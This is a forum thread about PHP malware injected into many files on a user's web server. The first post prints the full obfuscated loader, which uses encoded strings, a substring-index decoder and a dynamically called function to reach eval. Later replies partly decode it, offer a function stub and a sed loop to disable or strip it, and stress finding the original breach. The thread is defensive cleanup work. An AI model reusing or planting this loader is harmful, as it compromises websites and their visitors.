[SOLVED] Some virus/malware in my PHP script

robertjinx · 08-26-2014, 02:45 AM

I just noticed that on one of my servers I've got a lot of infected PHP files:

Code:

<?php $vucprjnldo = 'x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%167822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x78]252]y85]256]y6g]257]y86]2%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5323ldfid>}&;!osvufs}%x5c%x787f;!opjudov{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!77]y72]265]y39]274]y85]273f#00;quui#>.%x5c%x7825!<***f%x5c%0hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x782y74]256#<!%x5c%x7825ggvg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!x5c%x7860un>qp%x5c%x7825!|Z~!<##!25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5)%x5c%x7825z>>2*!%x5c%x7825z>35!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%bz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5825kj:-!OVMM*<(<%x5c%x78e%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsx67%42%x2c%163%x74%162%x5f%163%x70%154%x60%x5c%x7825}X;!sp!*#opo#>>}R;7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x782osvufs!|ftmf!~<**9.-j%x5c%xj{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:*%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo%x5c%x7825c:>1<%x5c%x7825b:>1<!gps24*<!%x5c%x7825kj:!>!#]y3d]51]y35]!*uyfu%x5c%x7827k:!ft27pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x725!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7eu{66~67<&w6<*&7-#o]s]o]s]#)fc%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x782c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x782539*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275]#>s%x5c%x7825<#462]47y]252]18F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{*oj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%c%x782f!#0#)idubn%x5c%x786x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78257825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<%x782fq%x5c%x7825>2q%x5c%x7msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%25t::!>!%x5c%x7824Ypp3)%x5c%x7825cB:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x74%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7]y6g]273]y76]271]y7d]252]y74]256]4gvodujpo!%x5c%x7824-%x5c%x7824y7%7]278]225]241]334]368]322]3]364]6]283]427]36]373P%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x782jA)qj3hopmA%x5c%x78273TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825mm!>!#]y81]273]y76]2585))!gj!<*#cd2bge56+99386c6f+9f5d816:5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x78:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878]445]43]321]464]284]364]6]234]342]58]24]31#-ZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R33f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7x6f%142%x5f%163%x74%141%x72%164"y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c_;gvc%x5c%x7825}&;ftmbg}%x5c%x787x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x55w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%z!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]%x5c%x7825!<*::::::-111112)eobs%x7825zW%x5c%x7825h>EzH,2W%x5c%x%x5c%x7825j=tj{fpg)%xx785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C>U<#16,47R57,27R66,#%x5c5>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782SFEBFI,6<*127-UVPFNJU,6<*27-7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%xc%x7878pmpusut)tpqssutRe%x5c%x7825x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!8257**^#zsfvr#%x5c%x785cq%x5c%xj%x5c%x7825>j%x5c%x7825!<25j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%xf_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUU825%x5c%x7824-%x5c%x7824b71]y83]256]y78]248]y8x78242178}527}88:}334}472%x5c%x7824<!%5c%x7825z>!tussfw)%x5c%c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786f;!osvufs}w;*%x5c%x787f!>>dXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fe860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%e:56-%x5c%x7878r.985:52985-t.98]K4]65%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c8246767~6<Cw6<pd%x5c%x782x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)vt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x782epdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5hx7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%8b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]8]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j+A!>!{e%x5c%x7825)!>>%x5c%x!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]y3e]81#%x5c%x782f#7e:55946-*#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7tww**WYsboepn)%x5c%x7825bss-%x5c%x782%x7825bbT-%x5c%x7825bT-3]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]7}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdotr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpx5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x785cSFWSFT%x5c%x78c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]2!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c5l}S;2-u%x5c%x7825!-#2#%xNULL); }6%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);}>!2p%x5c%x7825!|!*!***b%x5c%69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%5087fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y5r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.*#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;67]y74]275]y7:]268]y7f#<!%x5c%x5)!gj!|!*1?hmg%x5c%x7825)!gj256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x78x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x782%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x782727825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x78g}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<4-%x5c%x7824]y8%x5c%x7824-%x5c%xif((function_exists("%197-2qj%x5c%x78257-K)udfoopdXA%x5:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15pmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827d%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-mf!}Z;^nbsbq%x5c%x7825%x5cx7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)f)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x78id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujoc%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XA7f%x5c%x787f%x5c%x787f<u%x5sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x7bubE{h%x5c%x7825)sutc<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x7826<%x5c%x787fw6*3qj%x5c%x78257>%x5c5rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x78%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3q372]58y]472]37y]672]48y6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212jRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7y]}R;2]},;osvufs}%x5c%x7827;mnui%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x782]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]I&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbekc%x7824-tusqpt)%x5c%x78%x7860msvd}+;!>!}%x5c%x7827;!>>>!}y39]252]y83]273]y72]282#<x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x57,#%x5c%x782fq%x5c%x7825Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>7825wN;#-Ez-1H*WCw*[!%x5c%x782]D8]86]y31]278]y3f]51L3]84]y31M6x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!sbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x782565!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*w6Z6<.3%x5c%x7860hA%x5!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5cx7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x%x5c%x7825%x5c%x7878:!>#]y3g]61]yx7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeo!osvufs!~<3,j%x5c%x7825c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%qj%x5c%x78256<^#zsfvr#%x5c%x%x5c%x7825tdz>#L4]275L3g)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]2x5c%x7825j>1<%x5c%x7825j=6[%x593e:5597f-s.973:8297f:5297c%x785cq%x5c%x7825%x5c%x7827j @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%0LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K25r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&~6<%x5c%x787fw6<*K)ftpmdXA6|7**epmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x78)Rd%x5c%x7825)Rb%x5c%x7827825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bs/(.*)/epreg_replacesdvmuozaib'; $teylojttvr = explode(chr((307-263)),'7400,22,3129,32,7525,69,6305,61,9709,65,0,62,7003,49,1005,40,6394,54,9371,33,3071,58,4914,25,3496,68,2084,43,9232,22,6943,60,1456,43,1651,30,9943,46,4728,54,3767,58,3415,40,5191,61,8997,61,9912,31,7422,33,4525,47,9774,43,8079,34,8156,48,2621,22,7052,49,9528,28,8693,52,9680,29,7951,42,4232,31,7101,53,2356,50,969,36,4598,66,7594,36,2007,51,9302,69,3917,61,3889,28,6820,56,7820,43,8285,70,6448,61,5668,63,4664,64,9254,48,8593,34,3323,33,4572,26,1329,38,532,65,1140,27,10014,39,9462,22,3849,40,766,64,7259,42,1681,47,9058,53,4263,25,1774,41,5080,59,6669,28,6229,43,7630,47,7993,21,4996,44,5513,59,9484,44,8652,41,5252,69,8882,61,8014,65,327,33,7703,59,5139,52,3617,32,597,33,6366,28,9404,58,870,67,2058,26,360,37,4095,34,9989,25,2738,36,9868,44,4352,66,8509,61,7154,57,1581,70,3455,41,1728,46,1435,21,7677,26,6100,20,1045,30,2213,48,4939,57,212,39,7211,48,1875,57,1167,61,5600,68,251,50,5486,27,62,56,7924,27,7863,61,3015,56,8745,24,3825,24,2186,27,5919,50,1962,45,6576,62,8355,32,5861,58,1075,65,6272,25,9173,59,6176,53,301,26,2464,33,8627,25,669,67,6876,67,118,26,6638,31,2127,59,4782,45,3978,55,6751,69,2902,69,397,48,8204,23,1932,30,3161,69,2296,60,4464,38,2707,31,10053,53,8943,54,2580,41,2406,58,4418,25,1294,35,8570,23,630,39,8387,56,7368,32,445,65,2497,34,9111,62,3680,21,2774,70,2844,58,1401,34,6697,54,2261,35,144,68,6120,56,2643,64,3356,59,4502,23,3649,31,8820,30,8113,43,9817,51,4129,50,5731,37,6509,67,9654,26,4827,37,8850,32,5572,28,5969,68,3564,53,7301,67,9556,23,8443,66,8769,51,4864,50,5768,23,1499,35,3230,50,2531,49,8227,58,2971,44,830,40,3701,66,6037,63,1367,34,7762,58,4288,64,1815,60,5450,36,7455,70,9624,30,4179,53,736,30,4033,62,1534,47,3280,43,1228,66,5040,40,937,32,5321,60,510,22,9579,45,4443,21,5791,70,5381,69,6297,8'); $mawuedtwim=substr($vucprjnldo,(51847-41741),(21-14)); if (!function_exists('uwundfcpyb')) { function uwundfcpyb($caehqyfhhy, $qptunmxljk) { $gxowzmlndd = NULL; for($taijuorzga=0;$taijuorzga<(sizeof($caehqyfhhy)/2);$taijuorzga++) { $gxowzmlndd .= substr($qptunmxljk, $caehqyfhhy[($taijuorzga*2)],$caehqyfhhy[($taijuorzga*2)+1]); } return $gxowzmlndd; };} $tojphvmjdb="\x20\57\x2a\40\x61\167\x6f\145\x6f\163\x62\146\x76\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x34\55\x31\66\x37\51\x29\54\x20\143\x68\162\x28\50\x34\65\x33\55\x33\66\x31\51\x29\54\x20\165\x77\165\x6e\144\x66\143\x70\171\x62\50\x24\164\x65\171\x6c\157\x6a\164\x74\166\x72\54\x24\166\x75\143\x70\162\x6a\156\x6c\144\x6f\51\x29\51\x3b\40\x2f\52\x20\163\x69\166\x6c\153\x70\144\x6e\165\x6e\40\x2a\57\x20"; $bmnrgccpri=substr($vucprjnldo,(56718-46605),(42-30)); $bmnrgccpri($mawuedtwim, $tojphvmjdb, NULL); $bmnrgccpri=$tojphvmjdb; $bmnrgccpri=(506-385); $vucprjnldo=$bmnrgccpri-1; ?>

Does anybody know how to clean my PHP files without removing them, of course?

Slyke · 08-26-2014, 03:00 AM

Can you find where it's being executed?

robertjinx · 08-26-2014, 03:10 AM

No or not sure how, it seems to be a lot of PHP files being infected.

---------- Post added 08-26-14 at 10:11 ----------

BTW, tried clamscan, but doesn't seem to find the malware as an infection or issue.

Slyke · 08-26-2014, 03:19 AM

I'm trying to decrypt the code now.

Slyke · 08-26-2014, 03:39 AM

I've found where it's being executed. I've never seen PHP execute like this before.

The eval is inside the $tojphvmjdb variable, and for some reason PHP is executing it. I think it's passing the $tojphvmjdb variable into the $bmnrgccpri variable, and then PHP is executing it as a function (Since it has the brackets after it).

robertjinx · 08-26-2014, 04:24 AM

OK, cool, thanks for the analysis, but how can I remove all of this from all PHP files?

Slyke · 08-26-2014, 04:39 AM

This is going to take ages to reverse, but put this code at the top of your files:
if (!function_exists('uwundfcpyb')) { function uwundfcpyb() { return false; } }

That should stop it from executing. You'll need to do this in all infected files (You won't need to do it to any files that they include though, it only needs to run once at execution time).

When I say "should" I mean to say I have no idea how it's executing, but I do know that it requires that function to open up the rest of the code.

To remove it? That's a manual job.

robertjinx · 08-26-2014, 04:44 AM

Well, thats not nice, but I guess your idea it's pretty OK. Will try to see how do implement this the easy way.

Thanks again for the great work.

Slyke · 08-26-2014, 04:50 AM

How did you find it? Like, what is it doing?

I've pulled some of it apart and it tries really hard to hide itself.

Quote:

if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} error_reporting(0);

That's some of it I've been able to get.

robertjinx · 08-26-2014, 05:18 AM

Well didn't do any kind of magic, just opened one of the PHP files as the website didn't work as expected and I noted that there is some code which shouldn't be there.

robertjinx · 08-26-2014, 06:41 AM

Actually I've found that this little script might actually do the job:

for i in $(find . -name \*.php); do sed -i '/vucprjnldo/ s/<?php.*?>//' $i; done

At least for one of the wordpress sites it worked like a charm

sundialsvcs · 08-27-2014, 08:00 AM

Just, uhh, restore the contents of the server from a known-good copy in the, uhh, version-control system?

You do, uhh, have a separate development-system with isolated, known-good source code, and you, uhh, merely do a git checkout to update the production system, right? You don't, uhh, "just develop the thing right there on the production server," right? . . .

robertjinx · 08-28-2014, 02:15 AM

Its all done at the moment and seems to be 'bacteria' free

Hangdog42 · 08-30-2014, 08:10 AM

Quote:

Originally Posted by robertjinx

Its all done at the moment and seems to be 'bacteria' free

Really? And how do you know that?

Seriously, the issue isn't that there was code in your PHP, the issue is that someone was able to gain access to your machine and modify your files. You just happened to stumble on the PHP stuff, who knows what else they did.

If you haven't solved the real problem, the bad guys will be back.

Habitual · 08-30-2014, 09:42 AM

Quote:

Originally Posted by Hangdog42

Really? And how do you know that?

Seriously, the issue isn't that there was code in your PHP,
the issue is that someone was able to gain access to your machine and modify your files.

+1. the code in the php file is just the stuff you found.
A symptom of a worse condition.

If you're lucky, the php script code was all they did.